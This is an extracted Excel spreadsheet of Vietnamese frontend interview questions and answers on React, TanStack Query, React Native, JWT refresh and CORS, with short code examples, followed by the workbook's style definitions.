    <t>Ant Design v5 sử dụng kiến trúc CSS-in-JS nên tỷ lệ conflict CSS hệ thống là rất thấp. Tuy nhiên, khi cần customize sâu các component có sẵn của AntD bằng Styled-components mà không lo bị ghi đè do độ ưu tiên (Specificity)</t>
  </si>
  <si>
    <t>Dùng ConfigProvider của Ant Design để cấu hình lại các Design Tokens (màu sắc, font, độ bo góc) trên phạm vi toàn cục.
Với các component đặc thù, em bọc component của AntD vào Styled-components và sử dụng kỹ thuật tăng độ ưu tiên bằng selector (ví dụ: &amp;&amp; { ... }) để đảm bảo style của mình luôn được áp dụng."</t>
  </si>
  <si>
    <t>Về Data Fetching: Tại sao chọn Tanstack Query? 
Nó hơn useEffect + Axios ở đâu?</t>
  </si>
  <si>
    <t>Em sử dụng Tanstack Query vì nó giúp quản lý Server State cực kỳ hiệu quả. Nếu dùng useEffect kết hợp Axios truyền thống, em phải tự tạo các state loading, error, data, code rất rườm rà và dễ bị gọi API thừa khi component re-render.</t>
  </si>
  <si>
    <t>Tanstack Query giải quyết triệt để nhờ cơ chế:Caching: Lưu dữ liệu vào bộ nhớ đệm, hiển thị lập tức khi user quay lại trang cũ mà không cần chờ mạng.
Deduplication: Tự động gộp các request trùng nhau xảy ra trong cùng một thời điểm thành 1 request duy nhất gửi lên server.
Auto-refetch: Tự động cập nhật lại dữ liệu ngầm khi user focus lại vào tab trình duyệt."</t>
  </si>
  <si>
    <t>Về Mobile: Làm giao diện với React Native (Expo) khác gì ReactJS trên Web?</t>
  </si>
  <si>
    <t>Đáp án chuẩn: "Khác biệt lớn nhất nằm ở Thẻ UI, Layout CSS và Môi trường:
Thẻ UI: Web dùng &lt;div&gt;, &lt;p&gt;, &lt;span&gt;. React Native dùng các Core Components của thiết bị như &lt;View&gt;, &lt;Text&gt;, &lt;ScrollView&gt;.</t>
  </si>
  <si>
    <t>Layout: React Native sử dụng Flexbox làm mặc định nhưng hướng trục (flexDirection) mặc định là column (dọc) chứ không phải row (ngang) như trên Web.
CSS: Không dùng file .css thường mà dùng StyleSheet.create() để viết CSS-in-JS, và không hỗ trợ tất cả các thuộc tính CSS của Web (ví dụ không có hover)."</t>
  </si>
  <si>
    <t>Về Security: Xử lý thế nào nếu JWT Access Token hết hạn ngay trong lúc đang làm bài thi?</t>
  </si>
  <si>
    <t>Em sử dụng cơ chế Silent Refresh thông qua Axios Interceptors. Khi một request gửi đáp án lên NestJS bị trả về lỗi 401 Unauthorized (do Access Token hết hạn), Interceptor ở Frontend sẽ chặn lỗi này lại, tạm dừng các request khác và lập tức gọi API /auth/refresh gửi kèm Refresh Token để xin một Access Token mới.</t>
  </si>
  <si>
    <t>Sau khi lấy được token mới thành công, Interceptor sẽ tự động cấu hình lại header và gửi lại (retry) cái request làm bài thi bị lỗi lúc nãy. Toàn bộ quá trình diễn ra ngầm định dưới background, thí sinh làm bài liên tục mà không hề bị ngắt quãng hay mất dữ liệu bài thi."</t>
  </si>
  <si>
    <t>Event loop hoạt động thế nào?</t>
  </si>
  <si>
    <t>JavaScript là ngôn ngữ đơn luồng (Single-threaded). Nó thực thi code đồng bộ trong Call Stack. Các tác vụ bất đồng bộ (Timer, API) được đẩy sang Web APIs xử lý. Khi xong, callback của chúng xếp vào 2 hàng đợi: Microtask Queue (Promises, có ưu tiên cao) và Macrotask Queue (setTimeout). Event Loop liên tục kiểm tra: Nếu Call Stack rỗng, nó sẽ lột sạch Microtask Queue trước, rồi mới bốc một Macrotask sang Call Stack chạy, rồi lặp lại.</t>
  </si>
  <si>
    <t>console.log("1"); // Call Stack chạy ngay
setTimeout(() =&gt; console.log("2"), 0); // Đẩy vào Macrotask Queue
Promise.resolve().then(() =&gt; console.log("3")); // Đẩy vào Microtask Queue
console.log("4");
// Kết quả in ra: 1 -&gt; 4 -&gt; 3 -&gt; 2</t>
  </si>
  <si>
    <t>Reconciliation trong React là gì?</t>
  </si>
  <si>
    <t>à thuật toán đối chiếu của React. Khi state hoặc props thay đổi, React sinh ra một cây Virtual DOM mới và so sánh với cây cũ (gọi là thuật toán Diffing). Nhờ quy tắc tối ưu (như so sánh cùng loại thẻ và kiểm tra thuộc tính key), React tính toán ra số lượng thay đổi tối thiểu cần cập nhật lên DOM thật để đạt hiệu năng cao nhất.</t>
  </si>
  <si>
    <t>í dụ nhỏ: Thuộc tính key giúp React nhận diện phần tử không đổi để tránh re-render oan:
// Nếu mảng thay đổi thứ tự, React dựa vào ID (key) để đảo vị trí DOM 
// thay vì xóa đi vẽ lại toàn bộ thẻ &lt;li&gt; từ đầu.
&lt;ul&gt;
  {users.map(user =&gt; (
    &lt;li key={user.id}&gt;{user.name}&lt;/li&gt; 
  ))}
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Data fetching cache xử lý thế nào?</t>
  </si>
  <si>
    <t>Thay vì lưu API vào Redux, ta dùng thư viện chuyên Server-state quản lý cache bằng các Query Keys (đóng vai trò như ID của ô nhớ cache). Ta cần cấu hình 2 tham số: staleTime (thời gian data được coi là tươi, không cần gọi lại mạng) và cacheTime/gcTime (tuổi thọ của cục data trong RAM trước khi bị xóa).</t>
  </si>
  <si>
    <t>Ví dụ nhỏ: Cấu hình cache cho danh sách người dùng bằng TanStack Query:
import { useQuery } from '@tanstack/react-query';
import axios from 'axios';
function useGetUsers() {
  return useQuery({
    queryKey: ['users'], // Tên định danh vùng cache
    queryFn: () =&gt; axios.get('/api/users').then(res =&gt; res.data),
    staleTime: 1000 * 60 * 5, // Dữ liệu "tươi" trong 5 phút, không gọi lại API bừa bãi
    gcTime: 1000 * 60 * 10,   // Nằm trong bộ nhớ đệm 10 phút trước khi xóa hẳn
  });
}</t>
  </si>
  <si>
    <t>useEffect(() =&gt; {}, []) có chắc chỉ chạy một lần không?</t>
  </si>
  <si>
    <t>Bản chất: KHÔNG. Từ React 18 trở đi, ở môi trường Phát triển (development) khi bật Strict Mode, React sẽ cố tình chạy, hủy, rồi chạy lại useEffect (chạy 2 lần). Mục đích là để ép lập trình viên phải viết hàm dọn dẹp (cleanup function) nhằm phát hiện sớm lỗi rò rỉ bộ nhớ (Memory Leak).</t>
  </si>
  <si>
    <t>Ngoài ra, nếu component bị đổi thuộc tính key từ cha, nó cũng bị unmount và chạy lại từ đầu.</t>
  </si>
  <si>
    <t>useEffect(() =&gt; {
  console.log("Chạy 2 lần ở Dev Mode!");
  return () =&gt; console.log("Hàm cleanup bắt buộc phải có để dọn dẹp!");
}, []);</t>
  </si>
  <si>
    <t>setState xong đọc state ngay có giá trị mới không?</t>
  </si>
  <si>
    <t xml:space="preserve">KHÔNG. Hàm setState trong React hoạt động theo cơ chế bất đồng bộ và gom cụm (Batching). React sẽ xếp yêu cầu thay đổi state vào hàng đợi rồi đợi hàm chạy xong mới kích hoạt chu kỳ re-render để gom nhiều lần đổi state làm một, tối ưu hiệu năng. </t>
  </si>
  <si>
    <t>Muốn lấy giá trị mới ngay lập tức, bạn phải dùng biến tạm hoặc đọc trong useEffect lắng nghe chính biến đó.</t>
  </si>
  <si>
    <t>const [count, setCount] = useState(0);
const handleIncr = () =&gt; {
  setCount(count + 1);
  console.log(count); // ❌ Vẫn in ra số 0 cũ kỹ!
};</t>
  </si>
  <si>
    <t>Dùng index của mảng làm key có sao không?</t>
  </si>
  <si>
    <t>CÓ SAO nếu danh sách đó có tính năng thêm, xóa, hoặc đảo lộn thứ tự phần tử. React dựa vào thuộc tính key để đối chiếu cây Virtual DOM cũ và mới. Nếu dùng index, khi bạn xóa phần tử đầu tiên, phần tử số 2 sẽ bị ép nhận index: 0</t>
  </si>
  <si>
    <t>React sẽ lầm tưởng data của phần tử 1 bị sửa chứ không biết nó bị dịch chuyển ➡️ gây ra lỗi hiển thị nghiêm trọng (nhất là form input giữ state nội bộ) và làm sụt giảm hiệu năng.</t>
  </si>
  <si>
    <t>// ❌ TỆ: Sẽ dính bug hiển thị nếu mảng `todos` bị xóa/sắp xếp lại
{todos.map((todo, index) =&gt; &lt;TodoItem key={index} data={todo} /&gt;)}
// ✅ ĐÚNG: Luôn dùng ID duy nhất không thay đổi của thực thể dữ liệu
{todos.map((todo) =&gt; &lt;TodoItem key={todo.id} data={todo} /&gt;)}</t>
  </si>
  <si>
    <t>useRef thay đổi có kích hoạt render lại giao diện không?</t>
  </si>
  <si>
    <t>KHÔNG. useRef trả về một Object có thuộc tính duy nhất là .current nằm độc lập hoàn toàn ngoài vòng đời render của React. Thay đổi giá trị của .current không hề kích hoạt lại hàm vẽ giao diện.</t>
  </si>
  <si>
    <t>Nó chuyên dùng để lưu các biến "sống" qua các lần render (như ID của thẻ setTimeout) hoặc thọc trực tiếp vào thẻ DOM.</t>
  </si>
  <si>
    <t>const countRef = useRef(0);
const click = () =&gt; {
  countRef.current += 1; // ❌ Giá trị tăng trong RAM nhưng màn hình không hề thay đổi!
};</t>
  </si>
  <si>
    <t>React.memo có luôn giúp cải thiện hiệu năng không?</t>
  </si>
  <si>
    <t>Bản thân hàm React.memo cũng tiêu tốn tài nguyên máy tính để thực hiện phép so sánh nông (Shallow Comparison) giữa các Props cũ và Props mới. Nếu Component nhận các prop thay đổi liên tục ở mọi lần render (như một object viết inline),</t>
  </si>
  <si>
    <t>React.memo vừa không chặn được re-render, vừa tốn thêm tài nguyên chạy hàm so sánh ➡️ làm ứng dụng chạy chậm hơn.</t>
  </si>
  <si>
    <t>// ❌ TỆ: Bọc Memo vô ích vì object `style` luôn tạo ô nhớ mới ở cha làm con re-render liên tục
const ConBox = React.memo(({ style }) =&gt; &lt;div style={style}&gt;Box&lt;/div&gt;);</t>
  </si>
  <si>
    <t>useCallback có luôn cần thiết cho mọi hàm không?</t>
  </si>
  <si>
    <t>Khởi tạo một hàm bằng useCallback tốn tài nguyên hơn hàm thường (vì React phải sinh mảng dependency và lưu ô nhớ). Chỉ dùng useCallback khi hàm đó được truyền xuống một Component con đã được bọc bằng React.memo, hoặc hàm đó là dependency của một useEffect khác.</t>
  </si>
  <si>
    <t>// ❌ TỆ: Khởi tạo tốn tài nguyên vô ích vì thẻ &lt;button&gt; HTML thường không quan tâm ô nhớ hàm
const handleBtnClick = useCallback(() =&gt; console.log("Click"), []);
return &lt;button onClick={handleBtnClick}&gt;Gửi&lt;/button&gt;;</t>
  </si>
  <si>
    <t>Context API có thay thế được hoàn toàn Redux/Zustand không?</t>
  </si>
  <si>
    <t>KHÔNG. Context API là công cụ truyền dữ liệu xuống các tầng dưới (Dependency Injection), nó không phải là một công cụ quản lý trạng thái nâng cao. Context không có cơ chế tối ưu re-render: Bất kỳ thuộc tính nào trong value của Context thay đổi, toàn bộ các Component con đang gọi useContext đều bị ép buộc re-render đồng loạt.</t>
  </si>
  <si>
    <t>Redux/Zustand có cơ chế Selector thông minh, chỉ bắt component re-render nếu đúng mẩu dữ liệu nhỏ được đăng ký thay đổi.</t>
  </si>
  <si>
    <t>Props thay đổi thì component luôn luôn re-render đúng không?</t>
  </si>
  <si>
    <t>HÔNG CHẮC. Mặc định là Đúng. Nhưng nếu component được bọc trong React.memo hoặc sử dụng hàm tùy biến so sánh props React.memo(Component, (oldProps, newProps) =&gt; { ... }), component chỉ re-render nếu hàm so sánh đó trả về kết quả quy định là có đổi.</t>
  </si>
  <si>
    <t>Component Cha re-render thì Component Con có re-render không?</t>
  </si>
  <si>
    <t>CÓ, MẶC ĐỊNH LÀ LUÔN LUÔN. Dù component Con không nhận bất kỳ prop nào từ Cha, chỉ cần Cha đổi state, Con cũng bị quét và chạy lại từ đầu.</t>
  </si>
  <si>
    <t>Trừ khi component Con được bọc bảo vệ bằng React.memo hoặc Con được truyền xuống dưới dạng prop {children} cấu trúc từ một phạm vi scope khác.</t>
  </si>
  <si>
    <t>Cơ chế cấu hình CORS trên Server có phải là một giải pháp bảo mật bảo vệ Server khỏi bị hack không?</t>
  </si>
  <si>
    <t>KHÔNG. CORS (Cross-Origin Resource Sharing) là một rào cản chính sách do Trình duyệt (Browser) tự động thực thi để bảo vệ người dùng khỏi bị đánh cắp dữ liệu chéo tên miền, chứ nó KHÔNG bảo vệ Server.</t>
  </si>
  <si>
    <t>Hacker hoàn toàn có thể dùng các công cụ như Postman, cURL, hoặc viết một đoạn code NodeJS Backend (vốn không chịu sự quản lý của CORS trình duyệt) để spam, tấn công và lấy dữ liệu từ Server của bạn một cách bình thường.</t>
  </si>
  <si>
    <t>Lập trình viên Frontend có cần phải quan tâm và phòng chống tấn công SQL Injection không</t>
  </si>
  <si>
    <t>Một page React render chậm, bạn debug thế nào?</t>
  </si>
  <si>
    <t>1. Mở Chrome DevTools ➡️ Tab Profiler của React Developer Tools.
2. Bấm Record ➡️ Thao tác trên trang ➡️ Bấm Stop.
3. Quan sát biểu đồ hình ngọn lửa (Flameberry/Flame Chart). Tìm các component có màu vàng/cam (tốn nhiều thời gian render) và xem lý do hiển thị ở cột bên phải ("Why did this render?").</t>
  </si>
  <si>
    <t>Phát hiện component cha re-render kéo theo mảng danh sách con chạy lại dù data không đổi ➡️ Bọc component con vào React.memo.</t>
  </si>
  <si>
    <t>Một component re-render liên tục, bạn tìm nguyên nhân thế nào?</t>
  </si>
  <si>
    <t>Thủ phạm chính thường là vòng lặp vô tận do useEffect thay đổi một state, và chính state đó lại nằm trong mảng dependency của nó.</t>
  </si>
  <si>
    <t>Ví dụ giải pháp: Đặt console.log hoặc dùng hook useRef để theo dõi giá trị cũ và mới của các dependencies.</t>
  </si>
  <si>
    <t>// Cách phát hiện prop/state nào đổi làm component re-render vô tận
const prevProps = useRef(props);
useEffect(() =&gt; {
  console.log("Props thay đổi:", prevProps.current, props);
  prevProps.current = props;
});</t>
  </si>
  <si>
    <t>Một trang web bị trắng xóa màn hình (White Screen) ngay sau khi deploy, điều tra thế nào?</t>
  </si>
  <si>
    <t>1. Bấm F12 kiểm tra tab Console.
2. Nếu dính lỗi ChunkLoadError: Do bạn vừa deploy bản mới xóa file JS cũ, nhưng trình duyệt của user vẫn lưu cache file index.html cũ trỏ vào file JS đã không còn tồn tại ➡️ Cấu hình Server (Nginx/S3) trả về Header Cache-Control: no-store cho file index.html.
3. Nếu dính lỗi Javascript Crash: Đọc log lỗi trên Sentry để tìm chính xác dòng code bị sập.</t>
  </si>
  <si>
    <t>Người dùng upload file dung lượng lớn bị báo lỗi Timeout, xử lý thế nào?</t>
  </si>
  <si>
    <t>Đường truyền mạng không thể duy trì một request quá lâu cho file vài GB. Phải chuyển sang giải pháp Chunked Upload (Tải lên theo từng mảnh).</t>
  </si>
  <si>
    <t>Sử dụng hàm .slice() của JavaScript để chia file lớn thành nhiều mảnh nhỏ (ví dụ mỗi mảnh 5MB) và gửi tuần tự hoặc song song lên Server. Nếu đứt mạng, chỉ cần tải lại mảnh bị lỗi (Resume Upload).</t>
  </si>
  <si>
    <t>const queryClient = new QueryClient({
  defaultOptions: {
    queries: {
      staleTime: Infinity,
      cacheTime: 10 * 60 * 1000, // 10 phút
      refetchOnWindowFocus: false,
      retry: false,
    },
  },
});</t>
  </si>
  <si>
    <t>IMPORTANT
Câu hỏi phỏng vấn thường gặp: Phân biệt staleTime và cacheTime?
staleTime (Thời gian dữ liệu còn mới): Là thời gian dữ liệu được coi là "fresh" (mới). Khi staleTime còn hiệu lực, nếu component mount lại hoặc gọi lại query, React Query sẽ trả về dữ liệu trong cache mà không gọi lại API. Trong dự án của bạn, staleTime: Infinity nghĩa là dữ liệu sau khi fetch xong sẽ luôn luôn được coi là mới, không bao giờ tự động refetch ngầm (background refetch) trừ khi ta chủ động làm mới cache (invalidate).
cacheTime (Thời gian lưu cache dữ liệu): Là thời gian dữ liệu được lưu trong bộ nhớ tạm sau khi query đó không còn component nào sử dụng nữa (trạng thái inactive). Ở đây cấu hình 10 * 60 * 1000 (10 phút). Sau 10 phút ở trạng thái inactive, dữ liệu sẽ bị xóa hoàn toàn khỏi bộ nhớ để giải phóng RAM.
refetchOnWindowFocus: false: Khi người dùng chuyển tab trình duyệt và quay lại ứng dụng, React Query sẽ không tự động gọi lại API để làm mới dữ liệu (mặc định của thư viện là true).
retry: false: Khi gọi API bị lỗi, React Query sẽ không tự động thử lại (mặc định là thử lại 3 lần).</t>
  </si>
  <si>
    <t>2. Luồng xử lý Query (Lấy dữ liệu - Read)
Hãy cùng xem cách dự án khai báo và sử dụng Query trong file 
query.ts
.
Cấu trúc chung của Custom Query Hook
Tất cả các API lấy dữ liệu được bọc trong các Custom Hooks để dễ tái sử dụng. Mỗi hook nhận vào một tham số dạng IQueryParams&lt;TParams, TOptions&gt; được định nghĩa tại 
index.ts
:
typescript
// Định nghĩa kiểu params đầu vào
export interface IQueryParams&lt;TParams = any, TOptions = UseQueryOptions&lt;any, any, any&gt;&gt; {
  options?: TOptions; // Cho phép component ghi đè cấu hình (enabled, onSuccess, onError...)
  params?: TParams;   // Tham số truyền vào API (phân trang, filter...)
}</t>
  </si>
  <si>
    <t>Ví dụ 1: Query động có phụ thuộc tham số (useGetUsers)
typescript
export const useGetUsers = ({ 
  options, 
  params 
}: IQueryParams&lt;IUserListParams&gt; = {}): UseQueryResult&lt;IPagination&lt;ISSOUser&gt;&gt; =&gt; {
  const _options: UseQueryOptions&lt;IPagination&lt;ISSOUser&gt;, any, any&gt; = {
    queryKey: ['getUsers', params], // Query Key chứa cả params
    queryFn: () =&gt; getUsers(params), // Query Function gọi API
    ...options,
  };
  return useQuery(_options);
};
queryKey: ['getUsers', params]: Đây là điểm mấu chốt. Query Key hoạt động giống như một dependency array của useEffect. Khi params (ví dụ: số trang page đổi từ 1 sang 2, hoặc search query thay đổi), React Query sẽ nhận diện đây là một cache key mới và tự động gọi lại hàm getUsers(params) để lấy dữ liệu mới.</t>
  </si>
  <si>
    <t>Ví dụ 2: Dependent Query (Query phụ thuộc - useGetUserById)
typescript
export const useGetUserById = ({ 
  options, 
  params 
}: IQueryParams&lt;{ id: number }&gt; = {}): UseQueryResult&lt;ISSOUser&gt; =&gt; {
  const _options: UseQueryOptions&lt;ISSOUser, any, any&gt; = {
    queryKey: ['getUserById', params?.id],
    queryFn: () =&gt; getUserById(params!.id),
    enabled: !!params?.id, // Chỉ kích hoạt khi id tồn tại
    ...options,
  };
  return useQuery(_options);
};
enabled: !!params?.id: Đây là kỹ thuật xử lý bất đồng bộ rất quan trọng. Khi component vừa render, nếu params?.id chưa có (ví dụ: đang chờ dữ liệu khác hoặc id mang giá trị undefined), thuộc tính enabled: false sẽ ngăn không cho query này tự động chạy, tránh lỗi gọi API với tham số rác.</t>
  </si>
  <si>
    <t>3. Luồng xử lý Mutation (Thay đổi dữ liệu - Write/Create/Update/Delete)
Khi cần thực hiện các hành động làm thay đổi dữ liệu phía server (POST, PUT, DELETE), dự án sử dụng useMutation trong file 
mutation.ts
Quy trình đồng bộ hóa Client &amp; Server State (Cache Invalidation)
Đây là phần core cực kỳ quan trọng trong phỏng vấn về cách đồng bộ dữ liệu sau khi sửa đổi.
export const useCreateUser = () =&gt; {
  const queryClient = useQueryClient(); // Lấy đối tượng queryClient từ Context
  const { notification } = App.useApp(); // Đối tượng hiển thị thông báo của Ant Design
  return useMutation(
    (payload: IUserPayload) =&gt; createUser(payload), // Hàm gọi API tạo user
    {
      onSuccess: () =&gt; {
        // 1. Hiển thị thông báo thành công cho người dùng
        notification.success({ message: 'Thành công', description: 'Tạo người dùng thành công!' });
        // 2. Làm mới cache của danh sách users
        queryClient.invalidateQueries(['getUsers']);
      },
      onError: () =&gt; {
        notification.error({ message: 'Thất bại', description: 'Tạo người dùng thất bại!' });
      },
    }
  );
};</t>
  </si>
  <si>
    <t>TIP
Giải thích cơ chế hoạt động của invalidateQueries(['getUsers']) khi phỏng vấn:
Khi hàm createUser được gọi và phản hồi thành công từ server, callback onSuccess sẽ được kích hoạt.
Dòng queryClient.invalidateQueries(['getUsers']) sẽ tìm tất cả các query có chứa key bắt đầu bằng ['getUsers'].
Nó sẽ chuyển trạng thái của các dữ liệu cache này từ fresh sang stale (cũ kỹ/hết hạn).
Đồng thời, nếu component hiển thị danh sách người dùng (đang sử dụng hook useGetUsers) vẫn đang hiển thị trên màn hình (mounted), React Query sẽ ngay lập tức tự động trigger một background refetch để kéo danh sách mới nhất về và cập nhật UI mà người dùng không cần reload trang.</t>
  </si>
  <si>
    <t>4. Các câu hỏi phỏng vấn gợi ý dựa trên dự án này
Nếu nhà tuyển dụng hỏi sâu về thiết kế của bạn, đây là cách trả lời:
Tại sao bạn lại bọc useQuery và useMutation thành các Custom Hooks riêng biệt thay vì gọi trực tiếp trong component?
Trả lời: Giúp tách biệt logic nghiệp vụ (data fetching/mutating) ra khỏi UI component (separation of concerns). Component chỉ cần gọi hook và nhận về các trạng thái data, isLoading, mutate để render. Đồng thời dễ bảo trì, tái sử dụng các query key thống nhất trên toàn dự án và dễ dàng override cấu hình khi cần thiết.</t>
  </si>
  <si>
    <t>Dự án của bạn cấu hình staleTime: Infinity. Ưu điểm và nhược điểm của việc này là gì? Làm thế nào để giải quyết nhược điểm đó?
Ưu điểm: Giảm tải tối đa số lượng API request gửi lên server. Khi chuyển qua lại giữa các màn hình, dữ liệu sẽ được hiển thị ngay lập tức từ cache, đem lại trải nghiệm mượt mà (Instant UX).
Nhược điểm: Dữ liệu trên màn hình có thể bị lỗi thời nếu người dùng khác vừa thay đổi dữ liệu trên DB.
Cách khắc phục: Đã được giải quyết bằng cơ chế Cache Invalidation (chủ động xóa cache thông qua queryClient.invalidateQueries ở các sự kiện onSuccess của Mutations như thêm/sửa/xóa để đảm bảo dữ liệu mới nhất được refetch).
Làm thế nào để xử lý trạng thái Loading và Error trong các Hook này?
Trả lời: Đối với query, ta sử dụng các thuộc tính trả về từ hook như isLoading, isError, và error. Đối với mutation, ta có thể dùng isLoading (hoặc isPending trong v5) để disable nút submit nhằm tránh spam request, và dùng callback onError để toast thông báo lỗi như code dự án đang làm.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</si>
</sst>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7">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Candara"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial Unicode MS"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF11181C"/>
      <name val="Calibri"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Segoe UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Candara"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Candara"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="0"/>
      <name val="Candara"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="Candara"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Candar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444746"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial Unicode MS"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="34">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.399975585192419"/>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rgb="FF1F1F1F"/>
      </left>
      <right style="medium">
        <color rgb="FF1F1F1F"/>
      </right>
      <top style="medium">
        <color rgb="FF1F1F1F"/>
      </top>
      <bottom style="medium">
        <color rgb="FF1F1F1F"/>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4" borderId="1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0" applyNumberFormat="0" applyFill="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3" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="5" borderId="22" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="6" borderId="23" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="22" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="24" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="25" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="26"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2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="123">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xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1" readingOrder="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1" readingOrder="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="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1" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
